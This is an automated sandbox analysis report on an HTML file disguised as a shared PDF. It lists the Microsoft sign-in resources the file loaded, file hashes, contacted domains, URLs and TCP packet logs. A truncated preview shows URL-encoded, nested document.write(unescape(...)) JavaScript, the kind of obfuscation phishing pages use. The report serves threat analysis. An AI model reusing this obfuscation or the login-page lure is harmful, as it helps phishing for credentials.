Preview: @charset "utf-8";/*! mscc v0.4.1 - Copyright 2018 Microsoft Corporation */.cc-banner{position:relative;font-size:12px}.cc-banner .hide{display:none}.cc-banner a,.cc-banner div,.cc-banner span,.cc-banner svg{margin:0;padding:0;text-decoration:none}.cc-banner .cc-v-center{display:inline;vertical-align:middle;line-height:2em}.cc-banner[dir=rtl] .cc-float-left,.cc-float-right{float:right}.cc-banner[dir=rtl] .cc-float-right,.cc-float-left{float:left}.cc-banner{font-family:"Segoe UI","Helvetica Neue",Helvetica,Arial,sans-serif;color:#231f20;background:#f2f2f2;display:none;text-align:center;padding:0 1em;margin:0}@media (min-width:768px){.cc-banner{font-size:13px;padding:0 1.65em}}.cc-banner>.cc-container{text-align:left;padding:.75em 0;display:inline-block;width:100%}[dir=rtl].cc-banner>.cc-container{text-align:right}@media (min-width:1084px){.cc-banner{padding:0}.cc-banner>.cc-container{width:90%;max-width:1600px}}.cc-banner.active{display:block}.cc-banner .cc-icon{height:1.846em;width:1.84

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\mscc-0.4.1.min[1].js

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines, with no line terminators

Size (bytes): 3560

Entropy (8bit): 5.226312832132134

Encrypted: false

MD5: 5E9A1F4AA31D4AA60F6F899A2E45CEF8

SHA1: 460F6C21B08FA2723DBBC68613ABDF18213B2FAA

SHA-256: C87516D7DD7077EDD467F5B7B085B035CD4803ECF049670AB19DE004E270ABA8

SHA-512: 9AB7DAF8C92879019AFEBA5A8F04A593DE048233380C1A3FA071DCA0F51F9A9ACC12969C852CD8BF675744F25B4FA0A5D1EA82BB22FE6C3887FEBC797E943E86

Malicious: false

Preview: var mscc;!function(e){function t(e){for(var t=[],n=1;n<arguments.length;n++)t[n-1]=arguments[n];x[e]&&x[e].forEach(function(e){e.apply(null,t)})}function n(e,t){x[e]?x[e].push(t):x[e]=[t]}function o(e){if(e)for(var t=0,n=document.cookie.split("; ");t<n.length;t++){var o=n[t],a=o.indexOf("="),i=o.substring(0,a);if(i===e)return o.substring(i.length+1)}return null}function a(e,t,n){var a=new Date;a.setDate(a.getDate()+n);var i=I.split("."),c=i.pop();if("localhost"==c)document.cookie=0===n?e+"="+t+";path=/":e+"="+t+";expires="+a.toUTCString()+";path=/";else for(;o(e)!==t&&0!==i.length;)c=i.pop()+"."+c,document.cookie=0===n?e+"="+t+";path=/;domain=."+c:e+"="+t+";expires="+a.toUTCString()+";path=/;domain=."+c}function i(e,t){return e.classList?e.classList.contains(t):new RegExp("(^| )"+t+"( |$)","gi").test(e.className)}function c(e,t){e.classList?e.classList.add(t):e.className+=" "+t}function s(e,t){e.classList?e.classList.remove(t):e.className=e.className.replace(new RegExp("(^|\\b)"+t.spli

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\override[1].css

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines, with CRLF line terminators

Size (bytes): 1531

Entropy (8bit): 4.797455242405607

Encrypted: false

MD5: A570448F8E33150F5737B9A57B6D889A

SHA1: 860949A95B7598B394AA255FE06F530C3DA24E4E

SHA-256: 0BD288D5397A69EAD391875B422BF2CBDCC4F795D64AA2F780AFF45768D78248

SHA-512: 217F971A8012DE8FE170B4A20821A52FA198447FA582B82CF221F4D73E902C7E3AA1022CB0B209B6679C2EAE0F10469A149F510A6C2132C987F46214B1E2BBBC

Malicious: false

Preview: a.c-call-to-action:hover, button.c-call-to-action:hover{box-shadow:none!important}a.c-call-to-action:hover span, button.c-call-to-action:hover span{left:0!important}...c-call-to-action:not(.glyph-play):after { right: 0!important;} a.c-call-to-action:focus,button.c-call-to-action:focus{box-shadow:none!important}a.c-call-to-action:focus span,button.c-call-to-action:focus span{left:0!important;box-shadow:none!important}...theme-dark .c-me .msame_Header_name {color: #f2f2f2;}...pmg-page-wrapper .uhf div, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf span, .pmg-page-wrapper .uhf p, .pmg-page-wrapper .uhf input {font-family: Segoe UI,SegoeUI,Helvetica Neue,Helvetica,Arial,sans-serif !important;}..@media (min-width: 540px) {.pmg-page-wrapper .uhf .c-uhfh-alert span, .pmg-page-wrapper .uhf #uhf-g-nav span, .pmg-page-wrapper .uhf .c-uhfh-actions span, .pmg-page-wrapper .uhf li, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf #meC

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\servicesagreement[1].htm

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators

Size (bytes): 199457


Entropy (8bit): 5.106344003201765

Encrypted: false

MD5: 9F0C0F80CB1D15D6EAB320BBB12660EC

SHA1: 6112834A0C86BA145528324E92ED91CBE6B95104

SHA-256: 3CD6CC18C6B5FE59BEA20FBAD928F2643B8ECCBCE5510661A5B40F0D3C8BFA2E

SHA-512: 0078A67CB549003C520F875DD9EA0AEA91AD11DB64645169F504A43D620BA529F46674F390D3F434DFC6CC8DC77F431FD88147AE6FD9C653D2531953819CC2F2

Malicious: false

Preview: .<!DOCTYPE html ><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext" xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta name="viewport" content="initial-scale=1.0, width=device-width, user-scalable=no" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Microsoft Services Agreement</title><meta name="Title" content="Microsoft Services Agreement" /><meta name="CorrelationVector" content="TTKmV8refk2wecop.1" /><meta name="Description" content="" /><meta name="MscomContentLocale" content="en-us" /><link href="https://statics-uhf-wus.akamaized.net/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/e9-4413b1/4e-bb306d/a9-963a11/10-aee09b/51-465167/1d-9730ee/34-521645/51-6d3a1e?ver=2.0" rel="stylesheet" type="text/css" media="screen" /><link href="https://statics-uhf-wus.akamaized.net/statics/override.css?c=7" rel="stylesheet" type="text/css" media="screen" /><link href="https://c.s-microsoft.co


C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\style[1].css

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines, with no line terminators

Size (bytes): 30000

Entropy (8bit): 5.377378427765789

Encrypted: false

MD5: 6C307038F5B5E50AA688A666B48E9F0F

SHA1: C155031E01ABC003CF473DCF5620613BF719882D

SHA-256: 3403C7B22615CE65E3454CBE95C87010DA7F456C79E2344C1C5A0A15DC30B044

SHA-512: 610D067496F1BD81A5B4902D93D0EF1242A1AAC0F2D85138E92AB63EAA94C10C26ACAC490F1257DD8D17FC090F8E263E014E05B8ACB8742A8ECEF4E77BDC4E3F

Malicious: false

Preview: .com/data/icons/New-Social-Media-Icon-Set-V11/24/facebook.png') no-repeat !important;margin-left:10px;margin-right:10px;background-size:27px 27px !important}.video-button-container .video-twitter{width:28px;height:28px;background:url('https://cdn2.iconfinder.com/data/icons/New-Social-Media-Icon-Set-V11/24/twitter.png') no-repeat !important;margin-left:10px;margin-right:10px;background-size:27px 27px !important}.video-button-container .play{background-position:0 -1544px}.video-button-container .captions{background-position:0 -732px}.video-button-container .video-light{background-position:0 -964px}.video-button-container .fullscreen{background-position:0 -1196px}.video-button-container .mute{background-position:0 -1660px}#video-controls{position:absolute;margin-bottom:10px;bottom:0;left:0;right:0;height:50px;opacity:0;-webkit-transition:opacity .3s;-moz-transition:opacity .3s;-o-transition:opacity .3s;-ms-transition:opacity .3s;transition:opacity .3s;background-image:-webkit-gradient(lin

C:\Users\user\AppData\Local\Temp\~DF2952A600E710646A.TMP

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: data

Size (bytes): 132499

Entropy (8bit): 2.67613037807218

Encrypted: false

MD5: 05A3B067D2B361F9CE36C11FEC27E78A

SHA1: 26ADF890DB8264EE548DEE2F1AB1D554AB50612F

SHA-256: 774FD9D0BA65310BE85B95DDEA8D4941170DA2AA75F94E98705DD0263A7FAC27

SHA-512: 94106FB655D3290C7CC6FE32F409CFA661A040B215142B986D6A4F172212CC1ED8A467C745D0873686B393B2FDF0729FD70673751F4EE198C35863FAD21C5A08

Malicious: false

Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF627A96170C75B844.TMP

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: data

Size (bytes): 13077

Entropy (8bit): 0.5107383661010148

Encrypted: false

MD5: 39AE1993014236A99CAD2273F08A3EAD

SHA1: 383843D92894994437E2DC3C649362789ABECD40

SHA-256: C3B3D7EB81E964FE30501939991C97C3BE6D8A40A868184B9DC773CD696A7809

SHA-512: 6C6E2294C5FB35700837D5314D6BB7FAF6762B7469533688B4DA7E71CB49F0264C6D5D225A0C468D28E87A61CCD267A25730BD29C6B496A899DB377C1CC8CA9B

Malicious: false

Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFE2722E89930C0447.TMP

Process: C:\Program Files\internet explorer\iexplore.exe

File Type: data

Size (bytes): 25441


Entropy (8bit): 0.41825796848948976

Encrypted: false

MD5: 2CE578A5C18E3868F4B05FFD3AC32B45

SHA1: 87D3562F718DA2D2D9E6A663D4D5315F79C7FFB1

SHA-256: 184A717F67A8AB38A2C2F5F2177280A40F92B8FFE1F5F78F190DCD2976EE25E4

SHA-512: FB0CAFB4560422FAEED61552C3F4FDD235CCCE371C149F30B42DF834205F273F4B039D0273E74A76D1A0CEE5B944322F9B5CAF86F6091B53AC85253F922B9A1D

Malicious: false

Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................


Domains and IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection Reputation

aa-hip-prod.southcentralus.cloudapp.azure.com 104.215.74.84 true false high

cs1227.wpc.alphacdn.net 192.229.221.185 true false high

statics-uhf-wus.akamaized.net unknown unknown false high

signup.live.com unknown unknown false high

secure.aadcdn.microsoftonline-p.com unknown unknown false high

code.jquery.com unknown unknown false high

login.microsoftonline.com unknown unknown false high

aadcdn.msauth.net unknown unknown false high

assets.onestore.ms unknown unknown false high

img-prod-cms-rt-microsoft-com.akamaized.net unknown unknown false high

acctcdn.msauth.net unknown unknown false high

ajax.aspnetcdn.com unknown unknown false high

URLs from Memory and Binaries

Name Source Malicious Antivirus Detection Reputation

https://aka.ms/redeemrewards servicesagreement[1].htm.2.dr false high

https://login.skype.com/login privacystatement[1].htm.2.dr false high

https://www.skype.com/go/ustax servicesagreement[1].htm.2.dr false high

https://www.visiblemeasures.com/viewer-settings-opt-out privacystatement[1].htm.2.dr false high

jquery.org/license jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr false high

https://acctcdn.msauth.net signup[1].htm.2.dr false high

sizzlejs.com/ jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr false high

https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico~( imagestore.dat.2.dr false high

https://www.adr.org servicesagreement[1].htm.2.dr false high

https://login.microsof/Desktop/CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html {6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr false Avira URL Cloud: safe unknown

www.amazon.com/ msapplication.xml.1.dr false high

www.asp.net/ajaxlibrary/CDN.ashx. privacystatement[1].htm.2.dr false high

https://signup.live.com/error.aspx?errcode=1045&mkt=en-US signup[1].htm.2.dr false high

https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_bxeixgi3llnj-nuc4-xqwa2 reprocess[1].htm.2.dr false high

https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.core.min_2y6puv-fhesw6oymb- reprocess[1].htm.2.dr false Avira URL Cloud: safe unknown

aka.ms/kr4ndl privacystatement[1].htm.2.dr false high

https://www.xbox.com/en-US/Legal/CodeOfConduct servicesagreement[1].htm.2.dr false high

opensource.org/licenses/mit-license.php) knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr false high

www.twitter.com/ msapplication.xml5.1.dr false high

www.json.org/json2.js knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr false high

https://acctcdn.msauth.net/convergedsignuptemplatespackage_Z7Bw5rYduRaj_L3dZZgy6A2.js?v=1 signup[1].htm.2.dr false high

https://aadcdn.msauth.net/ests/2.1/ reprocess[1].htm.2.dr false high

www.xbox.com/ privacystatement[1].htm.2.dr false high

https://aka.ms/taxservice servicesagreement[1].htm.2.dr false high

https://watchbeam.zendesk.com/hc/en-us/articles/115000922623-Rules-of-User-Conduct privacystatement[1].htm.2.dr false high

https://www.privacyshield.gov/welcome privacystatement[1].htm.2.dr false high

https://acctcdn.msauth.net/images/convergedbg_small_v2_Z9GCPpM7FVE8hxRSZUez6g2.jpg) signup[1].htm.2.dr false high

https://ondemand.webtrends.com/support/optout.asp privacystatement[1].htm.2.dr false high

https://skype.com/go/myaccount servicesagreement[1].htm.2.dr false high

https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico~ imagestore.dat.2.dr false high

https://www.skype.com servicesagreement[1].htm.2.dr false high

https://www.appsflyer.com/optout privacystatement[1].htm.2.dr false high

https://www.privacyshield.gov/ privacystatement[1].htm.2.dr false high

https://privacy.micros {6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr false high

getbootstrap.com) knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr false high

https://acctcdn.msauth.net/lwsignupheaderjs_4NYTMbxtFAmu44aIr74B-Q2.js?v=1 signup[1].htm.2.dr false high

https://acctcdn.msauth.net/lightweightsignuppackage_wZ8EUx6qAhhR2oShS4Wetg2.js?v=1 signup[1].htm.2.dr false high

https://aim.yahoo.com/aim/us/en/optout/ privacystatement[1].htm.2.dr false high

www.mpegla.com servicesagreement[1].htm.2.dr false high

github.com/requirejs/almond/LICENSE 18-d72213[1].js.2.dr false high

www.clicktale.net/disable.html privacystatement[1].htm.2.dr false high

www.reddit.com/ msapplication.xml4.1.dr false high

https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.error.strings-en.min_xqvbwocyraoe reprocess[1].htm.2.dr false Avira URL Cloud: safe unknown

https://mixer.com/contact servicesagreement[1].htm.2.dr false high

https://www.here.com/) privacystatement[1].htm.2.dr false high

https://www.skype.com/go/store.reactivate.credit servicesagreement[1].htm.2.dr false high

https://www.adjust.com/opt-out/ privacystatement[1].htm.2.dr false high

www.nytimes.com/ msapplication.xml3.1.dr false high

https://acctcdn.msauth.net/images/convergedbg_v2_pdvUOT_2pyXH5ith335y8A2.jpg) signup[1].htm.2.dr false high

https://kissmetrics.com/user-privacy privacystatement[1].htm.2.dr false high

https://acctcdn.msauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg signup[1].htm.2.dr false high

https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico imagestore.dat.2.dr false high

https://acctcdn.msauth.net/images/favicon.ico?v=2~ imagestore.dat.2.dr false high

fontello.com icons[1].eot.2.dr false high

https://signup.live.co {6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr false high

https://acctcdn.msauth.net/jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=1 signup[1].htm.2.dr false high

knockoutjs.com/ ux.converged.error.core.min_2y6puv-fhesw6oymb-3hdq2[1].js.2.dr, knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr false high

https://ec.europa.eu/info/law/law-topic/data-protection/data-transfers-outside-eu/adequacy-protectio privacystatement[1].htm.2.dr false high

https://github.com/douglascrockford/JSON-js signup[1].htm.2.dr, ux.converged.error.core.min_2y6puv-fhesw6oymb-3hdq2[1].js.2.dr false high

https://acctcdn.msauth.net/images/favicon.ico?v=2~( imagestore.dat.2.dr false high

www.nielsen-online.com/corp.jsp?section=leg_prs&nav=1#Optoutchoices privacystatement[1].htm.2.dr false high

https://acctcdn.msauth.net/knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2.js?v=1 signup[1].htm.2.dr false high

https://www.skype.com/go/allrates servicesagreement[1].htm.2.dr false high

https://acctcdn.msauth.net/lwsignupstringscountrybirthdate_en-us_pfPjf9tCnoZxLPMa20Xx0A2.js?v=1 signup[1].htm.2.dr false high

www.opensource.org/licenses/mit-license.php) ux.converged.error.core.min_2y6puv-fhesw6oymb-3hdq2[1].js.2.dr, knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr false high

fontello.comiconsRegulariconsiconsVersion icons[1].eot.2.dr false high

www.criteo.com/ privacystatement[1].htm.2.dr false high

www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager.html privacystatement[1].htm.2.dr false high

https://login.microsof {6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr false high

www.youtube.com/ msapplication.xml7.1.dr false high

https://www.skype.com/go/legal servicesagreement[1].htm.2.dr false high

www.networkadvertising.org/ privacystatement[1].htm.2.dr false high

https://mixer.com/about/tos servicesagreement[1].htm.2.dr false high

https://www.microsoft. {6B3F30D6-A233-11E9-AADA-C25F135D3C65}.dat.1.dr false high

https://github.com/twbs/bootstrap/blob/master/LICENSE) knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js.2.dr false high

www.wikipedia.com/ msapplication.xml6.1.dr false high

https://acctcdn.msauth.net/images/favicon.ico?v=2 imagestore.dat.2.dr false high

https://www.skype.com/legal/broadcast servicesagreement[1].htm.2.dr false high

www.a9.com/ privacystatement[1].htm.2.dr false high

www.live.com/ msapplication.xml2.1.dr false high

https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css app[1].css.2.dr false high

https://www.linkedin.com/legal/privacy-policy privacystatement[1].htm.2.dr false high

https://login.microsoftonline.com/common/reprocess?ctx=rqiiaxwro2_tuacfc_mwlscowgdswary4nfiia4hcz2e2 ~DF2952A600E710646A.TMP.1.dr false high

www.appnexus.com/ privacystatement[1].htm.2.dr false high

https://acctcdn.msauth.net/converged_ux_v2_pfEhDrELLHNcznXIOy__sQ2.css?v=1 signup[1].htm.2.dr false high

jquery.com/ jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js.2.dr false high

https://www.xbox.com/Legal/ThirdPartyDataSharing privacystatement[1].htm.2.dr false high

Contacted IPs

Public

IP Country Flag ASN ASN Name Malicious

192.229.221.185 United States 15133 unknown false

104.215.74.84 United States 8075 unknown false

(Map legend: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs)

Static File Info

General

File type: HTML document, ASCII text, with very long lines, with CRLF line terminators

Entropy (8bit): 3.117783318185634

TrID: Java Script embedded in Visual Basic Script (4500/0) 100.00%

File name: CUsersadminisratorDocumentspagesselfSENDERSharedfile07092019_pdf.html2.html

File size: 566395

MD5: 0a3a65e4479f61e0d5618894d11c2e47

SHA1: 6e51ebe4fbcc3a4941fbb0e179f710470ac0da7f

SHA256: fb470475c8c24b97f8dbe7df23a312ad84de5feea065a99b1fd317bca80e4c7b

SHA512: 9fa49e82dddb99e261e15ef078e903a5db4c0d8d51f06dcd7ba59b594d365641e0cd957d8555ba6ff5fdc783616c5bc4837da0cc964685d6ce6015a33e26bd4b

SSDEEP: 768:5aAZeagr0A1SAvLEvS2S37WRQAElji3yX2AksAYmAVA3FSA3jfAkD+AkU/AkNEAu:m3jJwfZ0

File Content Preview: <script type="text/javascript">.. ..document.write(unescape('%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%6a%61%76%61%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%25%33%43%25%32%31%44%4f%43%54%5

File Icon

Icon Hash: f8c89c9a9a998cb8

Network Behavior

TCP Packets

Timestamp Source Port Dest Port Source IP Dest IP

Jul 9, 2019 03:22:37.604620934 CEST 49725 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.604711056 CEST 49726 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.604902983 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.605007887 CEST 49728 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.605221987 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.605460882 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.621936083 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.622029066 CEST 49725 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.622088909 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.622112036 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.622132063 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.622227907 CEST 49726 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.622272968 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.622273922 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.622293949 CEST 49728 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.622451067 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.622554064 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.622725010 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.623944998 CEST 49725 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.624990940 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.625138044 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.625617981 CEST 49728 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.628238916 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.628369093 CEST 49726 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.641062021 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642126083 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642177105 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642220020 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642251968 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642271042 CEST 443 49725 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642288923 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642308950 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642452955 CEST 49725 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.642946005 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.642995119 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643050909 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643151999 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.643182993 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643217087 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643321991 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.643357992 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643433094 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643450975 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.643498898 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643553019 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643606901 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.643672943 CEST 443 49729 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643716097 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643753052 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643779039 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.643798113 CEST 49728 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.643831968 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643855095 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.643874884 CEST 443 49728 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.644002914 CEST 49728 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.645184040 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.645358086 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646274090 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646306992 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646389961 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646456957 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646471024 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.646497011 CEST 443 49730 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646528006 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646563053 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646593094 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646611929 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646630049 CEST 443 49726 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.646693945 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.646713972 CEST 49726 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.660800934 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.663371086 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.664352894 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.664704084 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.665040016 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.666110992 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.666243076 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.666363001 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.666477919 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.666599989 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.675599098 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.676090002 CEST 49729 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.677460909 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.678528070 CEST 49730 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.679276943 CEST 49726 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.679908991 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.680039883 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.680138111 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.680264950 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.680337906 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.681052923 CEST 49725 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.681222916 CEST 49726 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.681548119 CEST 49727 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.681583881 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.681865931 CEST 49728 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.682305098 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.683160067 CEST 49725 443 192.168.2.5 192.229.221.185

Jul 9, 2019 03:22:37.683197021 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.683248043 CEST 443 49727 192.229.221.185 192.168.2.5

Jul 9, 2019 03:22:37.683276892 CEST 443 49727 192.229.221.185 192.168.2.5

UDP Packets

Timestamp Source Port Dest Port Source IP Dest IP

